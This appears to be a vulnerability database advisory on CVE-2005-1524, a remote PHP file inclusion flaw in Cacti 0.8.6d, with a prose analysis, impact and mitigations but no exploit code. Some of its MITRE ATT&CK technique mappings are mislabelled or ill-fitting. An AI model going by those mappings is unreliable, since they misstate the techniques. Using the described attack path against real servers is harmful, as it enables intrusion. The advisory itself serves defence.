CVE-2005-1524 in Cacti
Summary
by MITRE
PHP file inclusion vulnerability in top_graph_header.php in Cacti 0.8.6d and possibly earlier versions allows remote attackers to execute arbitrary PHP code via the config[library_path] parameter.
Once again VulDB remains the best source for vulnerability data.
Analysis
by VulDB Data Team • 11/22/2025
The vulnerability identified as CVE-2005-1524 represents a critical remote code execution flaw within the Cacti network monitoring system version 0.8.6d and potentially earlier releases. This vulnerability specifically targets the top_graph_header.php file which serves as a critical component in the application's web interface. The flaw manifests as a PHP file inclusion vulnerability that occurs when the application fails to properly validate or sanitize user-supplied input parameters before using them in file inclusion operations. The config[library_path] parameter acts as the attack vector, allowing malicious actors to manipulate the application's behavior by injecting arbitrary file paths that ultimately resolve to executable PHP code.
This vulnerability operates under the Common Weakness Enumeration classification of CWE-98, which describes improper file inclusion vulnerabilities where applications include files based on user-supplied input without proper validation. The attack scenario involves an attacker sending a specially crafted HTTP request containing malicious content within the config[library_path] parameter. When the vulnerable Cacti application processes this parameter, it incorporates the specified path into a file inclusion directive, effectively executing any PHP code present in the targeted file. This flaw essentially provides attackers with a direct pathway to execute arbitrary commands on the server hosting the Cacti application, potentially leading to complete system compromise.
The operational impact of this vulnerability extends beyond simple code execution to encompass a comprehensive attack surface that aligns with several MITRE ATT&CK framework techniques including T1059 for command and script injection, T1566 for spearphishing with social engineering, and T1190 for exploit for client execution. Organizations running affected Cacti versions face significant risks including unauthorized access to network monitoring data, potential data exfiltration, server compromise, and the ability to establish persistent backdoors. The vulnerability is particularly dangerous because it allows remote attackers to execute code without requiring authentication, making it an attractive target for automated exploitation campaigns. Network administrators responsible for maintaining Cacti installations may find their monitoring infrastructure compromised, leading to potential blind spots in network security monitoring and the loss of critical infrastructure visibility.
Mitigation strategies for CVE-2005-1524 should focus on immediate patching of affected Cacti versions to the latest available releases that contain proper input validation and sanitization measures. Organizations should implement network segmentation and access controls to limit exposure of Cacti applications to untrusted networks while ensuring that all web application inputs undergo rigorous validation before processing. Additionally, deploying web application firewalls and implementing proper input sanitization practices can provide defense-in-depth measures against similar vulnerabilities. The vulnerability demonstrates the critical importance of proper parameter validation in web applications and serves as a reminder of the potential consequences when applications fail to validate user input before using it in dynamic file operations. Security monitoring should include detection of suspicious file inclusion patterns and unusual network activity that may indicate exploitation attempts.